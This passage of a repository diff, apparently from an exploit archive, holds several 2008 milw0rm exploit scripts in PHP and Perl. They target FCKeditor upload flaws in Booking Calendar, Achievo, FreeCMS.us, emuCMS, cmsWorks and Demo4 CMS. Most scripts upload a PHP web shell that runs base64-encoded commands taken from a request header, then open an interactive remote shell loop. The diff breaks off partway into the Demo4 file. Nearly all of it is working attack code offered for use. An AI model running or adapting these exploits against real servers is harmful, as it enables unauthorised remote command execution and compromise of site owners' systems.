+*/
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
- $sock = fsockopen($host, 80);
+ $sock = fsockopen($host, 80);
- while (!$sock)
+ while (!$sock)
- {
+ {
-  print "\n[-] No response from {$host}:80 Trying again...";
+  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
+  $sock = fsockopen($host, 80);
- }
+ }
- fputs($sock, $packet);
+ fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
+ fclose($sock);
- return $resp;
+ return $resp;
-}
+}
-print "\n+------------------------------------------------------------+";
+print "\n+------------------------------------------------------------+";
-print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
+print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
-print "\n+------------------------------------------------------------+\n";
+print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
+if ($argc < 2)
-{
+{
- print "\nUsage......: php $argv[0] host path";
+ print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
+ print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
- die();
+ die();
-}
+}
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-$data  = "--12345\r\n";
+$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
+$data .= "--12345--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
+$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-while(1)
+while(1)
-{
+{
- print "\nstack-shell# ";
+ print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
+ $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
+ if ($cmd != "exit")
- {
+ {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
+  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
+  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
+  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
+  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
+  print "\n{$shell[1]}";
- }
+ }
- else break;
+ else break;
-}
+}
-?>
+?>
-
+
-# milw0rm.com [2008-05-29]
+# milw0rm.com [2008-05-29]
--- a/platforms/php/webapps/5770.php
+++ b/platforms/php/webapps/5770.php
@ -1,125 +1,125 @@
-<?php
+<?php
-
+
-/*
+/*
-	-----------------------------------------------------------------
+	-----------------------------------------------------------------
-	Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
+	Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
-	-----------------------------------------------------------------
+	-----------------------------------------------------------------
-	
+	
-	author...: EgiX
+	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
+	mail.....: n0b0d13s[at]gmail[dot]com
-	
+	
-	link.....: http://www.achievo.org/
+	link.....: http://www.achievo.org/
-	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
-	
+	
-	[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
+	[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
-	
+	
-	121.	//File Area
+	121.	//File Area
-	122.	$fckphp_config['ResourceAreas']['File'] =array(
+	122.	$fckphp_config['ResourceAreas']['File'] =array(
-	123.		
+	123.		
-	124.		//Files(identified by extension) that may be uploaded to this area
+	124.		//Files(identified by extension) that may be uploaded to this area
-	125.		'AllowedExtensions'	=>	array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
+	125.		'AllowedExtensions'	=>	array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
-	
+	
-	with a default configuration of this script, an attacker might be able to upload arbitrary
+	with a default configuration of this script, an attacker might be able to upload arbitrary
-	files containing malicious PHP code due to multiple file extensions isn't properly checked
+	files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
+*/
-
+
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-
+
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
-	$sock = fsockopen($host, 80);
+	$sock = fsockopen($host, 80);
-	while (!$sock)
+	while (!$sock)
-	{
+	{
-		print "\n[-] No response from {$host}:80 Trying again...";
+		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
+		$sock = fsockopen($host, 80);
-	}
+	}
-	fputs($sock, $packet);
+	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
+	fclose($sock);
-	return $resp;
+	return $resp;
-}
+}
-
+
-function upload()
+function upload()
-{
+{
-	global $host, $path;
+	global $host, $path;
-	
+	
-	$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
+	$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
-	$file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
+	$file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
-	
+	
-	foreach ($file_ext as $ext)
+	foreach ($file_ext as $ext)
-	{
+	{
-		print "\n[-] Trying to upload with .{$ext} extension...";
+		print "\n[-] Trying to upload with .{$ext} extension...";
-		
+		
-		$data  = "--12345\r\n";
+		$data  = "--12345\r\n";
-		$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
+		$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
-		$data .= "Content-Type: application/octet-stream\r\n\r\n";
+		$data .= "Content-Type: application/octet-stream\r\n\r\n";
-		$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+		$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-		$data .= "--12345--\r\n";
+		$data .= "--12345--\r\n";
-		
+		
-		$packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
+		$packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
+		$packet .= "Host: {$host}\r\n";
-		$packet .= "Content-Length: ".strlen($data)."\r\n";
+		$packet .= "Content-Length: ".strlen($data)."\r\n";
-		$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+		$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-		$packet .= "Connection: close\r\n\r\n";
+		$packet .= "Connection: close\r\n\r\n";
-		$packet .= $data;
+		$packet .= $data;
-		
+		
-		preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
+		preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
-		
+		
-		if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
+		if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
-		
+		
-		$packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+		$packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
+		$packet .= "Host: {$host}\r\n";
-		$packet .= "Connection: close\r\n\r\n";
+		$packet .= "Connection: close\r\n\r\n";
-		$html    = http_send($host, $packet);
+		$html    = http_send($host, $packet);
-		
+		
-		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-		
+		
-		sleep(1);
+		sleep(1);
-	}
+	}
-	
+	
-	return false;
+	return false;
-}
+}
-
+
-print "\n+--------------------------------------------------------------------+";
+print "\n+--------------------------------------------------------------------+";
-print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
+print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
-print "\n+--------------------------------------------------------------------+\n";
+print "\n+--------------------------------------------------------------------+\n";
-
+
-if ($argc < 3)
+if ($argc < 3)
-{
+{
-	print "\nUsage......: php $argv[0] host path\n";
+	print "\nUsage......: php $argv[0] host path\n";
-	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /achievo/\n";
+	print "\nExample....: php $argv[0] localhost /achievo/\n";
-	die();
+	die();
-}
+}
-
+
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-
+
-if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
+if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
+else print "\n[-] Shell uploaded...starting it!\n";
-
+
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-
+
-while(1)
+while(1)
-{
+{
-	print "\nachievo-shell# ";
+	print "\nachievo-shell# ";
-	$cmd = trim(fgets(STDIN));
+	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
+	if ($cmd != "exit")
-	{
+	{
-		$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+		$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
+		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
+		$packet.= "Connection: close\r\n\r\n";
-		$html   = http_send($host, $packet);
+		$html   = http_send($host, $packet);
-		if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
+		if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
-		$shell = explode("_code_", $html);
+		$shell = explode("_code_", $html);
-		print "\n{$shell[1]}";
+		print "\n{$shell[1]}";
-	}
+	}
-	else break;
+	else break;
-}
+}
-
+
-?>
+?>
-
+
-# milw0rm.com [2008-06-09]
+# milw0rm.com [2008-06-09]
--- a/platforms/php/webapps/5844.php
+++ b/platforms/php/webapps/5844.php
@ -1,73 +1,73 @@
-<?php
+<?php
-/*
+/*
- --------------------------------------------------------------
+ --------------------------------------------------------------
- FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
+ FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
- --------------------------------------------------------------
+ --------------------------------------------------------------
- By : Stack
+ By : Stack
-  Special thnx for : Egix
+  Special thnx for : Egix
- [-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
+ [-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
- 
+ 
- with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
+ with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
-*/
+*/
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
- $sock = fsockopen($host, 80);
+ $sock = fsockopen($host, 80);
- while (!$sock)
+ while (!$sock)
- {
+ {
-  print "\n[-] No response from {$host}:80 Trying again...";
+  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
+  $sock = fsockopen($host, 80);
- }
+ }
- fputs($sock, $packet);
+ fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
+ fclose($sock);
- return $resp;
+ return $resp;
-}
+}
-print "\n+------------------------------------------------------------+";
+print "\n+------------------------------------------------------------+";
-print "\n|File Upload Exploit by Stack |";
+print "\n|File Upload Exploit by Stack |";
-print "\n+------------------------------------------------------------+\n";
+print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
+if ($argc < 2)
-{
+{
- print "\nUsage......: php $argv[0] host path";
+ print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
+ print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
- die();
+ die();
-}
+}
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-$data  = "--12345\r\n";
+$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
+$data .= "--12345--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
+$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-while(1)
+while(1)
-{
+{
- print "\nstack-shell# ";
+ print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
+ $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
+ if ($cmd != "exit")
- {
+ {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
+  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
+  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
+  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
+  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
+  print "\n{$shell[1]}";
- }
+ }
- else break;
+ else break;
-}
+}
-?>
+?>
-
+
-# milw0rm.com [2008-06-17]
+# milw0rm.com [2008-06-17]
--- a/platforms/php/webapps/5907.pl
+++ b/platforms/php/webapps/5907.pl
@ -1,29 +1,29 @@
-#!/usr/bin/perl
+#!/usr/bin/perl
-use strict;
+use strict;
-use warnings;
+use warnings;
-use LWP::UserAgent;
+use LWP::UserAgent;
-use HTTP::Request::Common;
+use HTTP::Request::Common;
-print <<INTRO;
+print <<INTRO;
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
-+emuCMS 0.3 (fckeditor) Arbitrary File Upload  xpl  +
+emuCMS 0.3 (fckeditor) Arbitrary File Upload  xpl  +
-+                                                   +
+                                                   +
-+                   By: Stack                       +
+                   By: Stack                       +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
-# t0pP8uZz  
+# t0pP8uZz  
-INTRO
+INTRO
-print "Enter URL(ie: http://site.com): ";
+print "Enter URL(ie: http://site.com): ";
-    chomp(my $url=<STDIN>);
+    chomp(my $url=<STDIN>);
-   
+   
-print "Enter File Path(path to local file to upload): ";
+print "Enter File Path(path to local file to upload): ";
-    chomp(my $file=<STDIN>);
+    chomp(my $file=<STDIN>);
-my $ua = LWP::UserAgent->new;
+my $ua = LWP::UserAgent->new;
-my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
+my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
-                      Content_Type => 'form-data',
+                      Content_Type => 'form-data',
-                      Content      => [ NewFile => $file ] );
+                      Content      => [ NewFile => $file ] );
-if($re->is_success) {
+if($re->is_success) {
-    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
+    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
-    else { print "File Upload Is Disabled! Failed!\n"; }
+    else { print "File Upload Is Disabled! Failed!\n"; }
-} else { print "HTTP Request Failed!\n"; }
+} else { print "HTTP Request Failed!\n"; }
-exit;
+exit;
-
+
-# milw0rm.com [2008-06-23]
+# milw0rm.com [2008-06-23]
--- a/platforms/php/webapps/5922.php
+++ b/platforms/php/webapps/5922.php
@ -1,112 +1,112 @@
-<?php
+<?php
-/*
+/*
- -----------------------------------------------------------------
+ -----------------------------------------------------------------
- cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit
+ cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit
- -----------------------------------------------------------------
+ -----------------------------------------------------------------
- discovered by Stack
+ discovered by Stack
- exploited by ..: EgiX
+ exploited by ..: EgiX
- special thnx to EgiX
+ special thnx to EgiX
- details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+ details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
- 
+ 
- [-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
+ [-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
- 
+ 
- 121. //File Area
+ 121. //File Area
- 122. $fckphp_config['ResourceAreas']['File'] =array(
+ 122. $fckphp_config['ResourceAreas']['File'] =array(
- 123.  
+ 123.  
- 124.  //Files(identified by extension) that may be uploaded to this area
+ 124.  //Files(identified by extension) that may be uploaded to this area
- 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
+ 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
- 
+ 
- with a default configuration of this script, an attacker might be able to upload arbitrary
+ with a default configuration of this script, an attacker might be able to upload arbitrary
- files containing malicious PHP code due to multiple file extensions isn't properly checked
+ files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
+*/
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
- $sock = fsockopen($host, 80);
+ $sock = fsockopen($host, 80);
- while (!$sock)
+ while (!$sock)
- {
+ {
-  print "\n[-] No response from {$host}:80 Trying again...";
+  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
+  $sock = fsockopen($host, 80);
- }
+ }
- fputs($sock, $packet);
+ fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
+ fclose($sock);
- return $resp;
+ return $resp;
-}
+}
-function upload()
+function upload()
-{
+{
- global $host, $path;
+ global $host, $path;
- 
+ 
- $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
+ $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
- $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
+ $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
- 
+ 
- foreach ($file_ext as $ext)
+ foreach ($file_ext as $ext)
- {
+ {
-  print "\n[-] Trying to upload with .{$ext} extension...";
+  print "\n[-] Trying to upload with .{$ext} extension...";
-  
+  
-  $data  = "--12345\r\n";
+  $data  = "--12345\r\n";
-  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
+  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
-  $data .= "Content-Type: application/octet-stream\r\n\r\n";
+  $data .= "Content-Type: application/octet-stream\r\n\r\n";
-  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-  $data .= "--12345--\r\n";
+  $data .= "--12345--\r\n";
-  
+  
-  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
+  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
+  $packet .= "Host: {$host}\r\n";
-  $packet .= "Content-Length: ".strlen($data)."\r\n";
+  $packet .= "Content-Length: ".strlen($data)."\r\n";
-  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-  $packet .= "Connection: close\r\n\r\n";
+  $packet .= "Connection: close\r\n\r\n";
-  $packet .= $data;
+  $packet .= $data;
-  
+  
-  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
+  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
-  
+  
-  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
+  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
-  
+  
-  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet .= "Host: {$host}\r\n";
+  $packet .= "Host: {$host}\r\n";
-  $packet .= "Connection: close\r\n\r\n";
+  $packet .= "Connection: close\r\n\r\n";
-  $html    = http_send($host, $packet);
+  $html    = http_send($host, $packet);
-  
+  
-  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-  
+  
-  sleep(1);
+  sleep(1);
- }
+ }
- 
+ 
- return false;
+ return false;
-}
+}
-print "\n+--------------------------------------------------------------------+";
+print "\n+--------------------------------------------------------------------+";
-print "\n| cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit |";
+print "\n| cmsWorks 2.2 RC4   (fckeditor) Remote Arbitrary File Upload Exploit |";
-print "\n+--------------------------------------------------------------------+\n";
+print "\n+--------------------------------------------------------------------+\n";
-if ($argc < 3)
+if ($argc < 3)
-{
+{
- print "\nUsage......: php $argv[0] host path\n";
+ print "\nUsage......: php $argv[0] host path\n";
- print "\nExample....: php $argv[0] localhost /";
+ print "\nExample....: php $argv[0] localhost /";
- print "\nExample....: php $argv[0] localhost /achievo/\n";
+ print "\nExample....: php $argv[0] localhost /achievo/\n";
- die();
+ die();
-}
+}
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
+if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
-else print "\n[-] Shell uploaded...starting it!\n";
+else print "\n[-] Shell uploaded...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-while(1)
+while(1)
-{
+{
- print "\nStack-shell# ";
+ print "\nStack-shell# ";
- $cmd = trim(fgets(STDIN));
+ $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
+ if ($cmd != "exit")
- {
+ {
-  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
+  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
+  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
+  $packet.= "Connection: close\r\n\r\n";
-  $html   = http_send($host, $packet);
+  $html   = http_send($host, $packet);
-  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
+  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $html);
+  $shell = explode("_code_", $html);
-  print "\n{$shell[1]}";
+  print "\n{$shell[1]}";
- }
+ }
- else break;
+ else break;
-}
+}
-?>
+?>
-
+
-# milw0rm.com [2008-06-23]
+# milw0rm.com [2008-06-23]
--- a/platforms/php/webapps/5923.pl
+++ b/platforms/php/webapps/5923.pl
@ -1,136 +1,136 @@
-<?php
+<?php
-/*
+/*
- --------------------------------------------------------------
+ --------------------------------------------------------------
-      Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
+      Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
- --------------------------------------------------------------
+ --------------------------------------------------------------
-   by Stack
+   by Stack
-  Special thnx for : Egix
+  Special thnx for : Egix
- [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
+ [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
- 
+ 
- 41. // Get the posted file.
+ 41. // Get the posted file.
- 42. $oFile = $_FILES['NewFile'] ;
+ 42. $oFile = $_FILES['NewFile'] ;
- 43.
+ 43.
- 44. // Get the uploaded file name and extension.
+ 44. // Get the uploaded file name and extension.
- 45. $sFileName = $oFile['name'] ;
+ 45. $sFileName = $oFile['name'] ;
- 46. $sOriginalFileName = $sFileName ;
+ 46. $sOriginalFileName = $sFileName ;
- 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
